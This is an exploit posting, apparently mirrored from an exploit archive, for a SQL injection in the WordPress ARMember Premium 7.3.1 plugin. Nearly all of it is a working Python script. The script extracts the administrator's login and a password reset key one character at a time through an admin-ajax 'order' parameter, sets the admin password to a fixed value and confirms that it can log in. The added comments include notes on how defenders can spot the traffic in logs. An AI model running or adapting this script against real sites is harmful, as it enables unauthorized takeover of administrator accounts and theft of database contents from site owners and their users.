## https://sploitus.com/exploit?id=PACKETSTORM:222845
==================================================================================================================================
| # Title : WordPress ARMember Premium 7.3.1 SQL Injection and Account Takeover |
| # Author : indoushka |
| # Tested on : Windows 11 Fr (Pro) / browser : Mozilla Firefox 147.0.4 (64-bit) |
| # Vendor : https://codecanyon.net/item/armember-complete-wordpress-membership-system/17785056 |
==================================================================================================================================
[+] Summary : This Python script implements a multi-stage exploitation workflow against a vulnerable WordPress installation, using a SQL injection flaw in ARMember's directory functionality.
[+] POC :
import requests
import string
def exploit_armember(target_url, directory_page, nonce, template_id):
    """Exploit for CVE-2026-5076: turn the SQL injection oracle into an admin password reset.

    Args:
        target_url: Base URL of the WordPress site, without a trailing slash
            (it is concatenated directly with ``/?armrp=...`` and
            ``/wp-login.php`` below).
        directory_page: Accepted but never read by this function.
        nonce: Sent as ``arm_wp_nonce`` to the admin-ajax action; the caller
            must already possess a value the target accepts.
        template_id: Sent as ``template_id`` to the admin-ajax action.

    Side effects:
        Prints progress to stdout and, if the reset form is reachable,
        changes the password of the ``ID=1`` WordPress user to the
        hard-coded value used below.

    Defender notes:
        Nothing here is hidden: every stage is a plain ``requests`` call with
        no session reuse, so the sequence shows up in access logs as (1) a
        burst of POSTs to ``admin-ajax.php`` (see ``extract_sqli_string``),
        (2) a GET and a POST to ``/?armrp=true&key=...&login=...`` with the
        key and login in the query string, and (3) a POST to
        ``wp-login.php`` for the recovered account.
    """
    # Stage 1: recover the login name of the user with ID=1 one character at
    # a time. The script treats that row as the administrator (see the
    # print below); that is an assumption, not something it verifies.
    admin_user = extract_sqli_string(
        target_url, nonce, template_id,
        "(SELECT user_login FROM wp_users WHERE ID=1)"
    )
    print(f"[+] Admin user: {admin_user}")
    # Stage 2: read a pending reset key from wp_usermeta. The script relies
    # on ``arm_reset_password_key`` being stored in a directly usable
    # (plaintext) form; ``LIMIT 1`` simply takes the first row the database
    # returns, with no filter on which user it belongs to.
    reset_key = extract_sqli_string(
        target_url, nonce, template_id,
        "(SELECT meta_value FROM wp_usermeta WHERE meta_key='arm_reset_password_key' LIMIT 1)"
    )
    print(f"[+] Plaintext reset key: {reset_key}")
    # Stage 3: the reset form is only submitted when the GET response
    # contains "Reset Password"; otherwise the function silently does nothing
    # further for this stage.
    reset_url = f"{target_url}/?armrp=true&key={reset_key}&login={admin_user}"
    r = requests.get(reset_url)
    if "Reset Password" in r.text:
        requests.post(reset_url, data={
            'pass1': 'Hacked123!',
            'pass2': 'Hacked123!',
            'key': reset_key,
            'login': admin_user
        })
        # Printed unconditionally after the POST; the response is not checked.
        print("[+] Password changed successfully!")
    # Stage 4: confirm by logging in through the standard form. The only
    # success criterion is the substring "dashboard" in the response body.
    # No requests.Session is used, so cookies from the reset step are not
    # carried over; this login stands on its own.
    login_data = {
        'log': admin_user,
        'pwd': 'Hacked123!',
        'wp-submit': 'Log In'
    }
    login_response = requests.post(f"{target_url}/wp-login.php", data=login_data)
    if "dashboard" in login_response.text.lower():
        # The bracketed glyph in this message is mis-encoded in the source.
        print("[โ] ADMIN ACCESS CONFIRMED!")
def extract_sqli_string(target, nonce, tid, query):
    """Recover the result of ``query`` one character at a time via a boolean oracle.

    Despite the original one-line docstring ("Binary search"), this is a
    linear scan: for each position it tries every character of ``charset``
    in turn, issuing one POST per guess.

    Args:
        target: Base URL of the WordPress site, without a trailing slash.
        nonce: Sent as ``arm_wp_nonce``.
        tid: Sent as ``template_id``.
        query: A MySQL scalar subquery; it is embedded unquoted into the
            ``order`` parameter of the ``arm_directory_paging_action``
            admin-ajax action.

    Returns:
        The recovered string, at most 49 characters long and made only of
        ASCII letters and digits. The first position whose true character is
        outside that charset ends the search, so values containing other
        characters come back truncated.

    Defender notes:
        Each recovered character costs up to 62 requests, so one call can
        generate hundreds to thousands of POSTs to ``admin-ajax.php`` from a
        single client in quick succession, all carrying an ``order``
        parameter that contains SQL keywords (``IF``, ``SUBSTRING``,
        ``SELECT``). Both the request rate and the parameter contents are
        straightforward log/WAF detection points.
    """
    result = ""
    charset = string.ascii_letters + string.digits
    for pos in range(1, 50):
        for char in charset:
            # The ``order`` value is assumed to reach the SQL ORDER BY clause
            # unsanitized (the premise of the finding). The IF() makes the
            # query evaluate normally when the guess is right and evaluate an
            # expression the script expects to fail when it is wrong; the
            # response size is used to tell the two apart.
            payload = f"ASC,IF(SUBSTRING(({query}),{pos},1)='{char}',1,EXP(710))"
            response = requests.post(
                f"{target}/wp-admin/admin-ajax.php",
                data={
                    'action': 'arm_directory_paging_action',
                    'arm_wp_nonce': nonce,
                    'template_id': tid,
                    'type': 'directory',
                    'order': payload
                }
            )
            # Heuristic oracle: a body longer than 1000 bytes is read as
            # "query succeeded, guess correct". The threshold is site-specific
            # and nothing here validates it; HTTP status is not inspected.
            if len(response.text) > 1000: # Success response size
                result += char
                break
        else:
            # for/else: no character in charset matched at this position, so
            # the string is assumed to have ended (or to contain an
            # out-of-charset character). Stop scanning further positions.
            break
    return result
if __name__ == "__main__":
    # Example invocation with placeholder values supplied by the author; the
    # URL, nonce and template_id are illustrative, not live. ``directory_page``
    # is passed here but exploit_armember never reads it.
    exploit_armember(
        target_url="https://vulnerable-site.com",
        directory_page="/members/",
        nonce="a1b2c3d4e5f67890",
        template_id="123"
    )
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================